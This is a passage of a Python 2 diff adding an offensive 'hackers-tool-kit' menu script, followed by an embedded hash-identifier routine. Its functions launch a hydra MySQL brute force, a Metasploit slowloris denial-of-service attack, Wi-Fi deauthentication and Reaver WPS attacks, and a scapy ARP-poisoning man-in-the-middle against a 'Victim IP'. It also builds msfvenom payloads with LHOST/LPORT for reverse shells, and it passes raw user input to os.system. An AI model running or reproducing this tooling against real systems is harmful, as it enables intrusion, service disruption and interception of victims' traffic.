+-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') + os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) + os.system('echo "run\n" >> handler.rc') + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 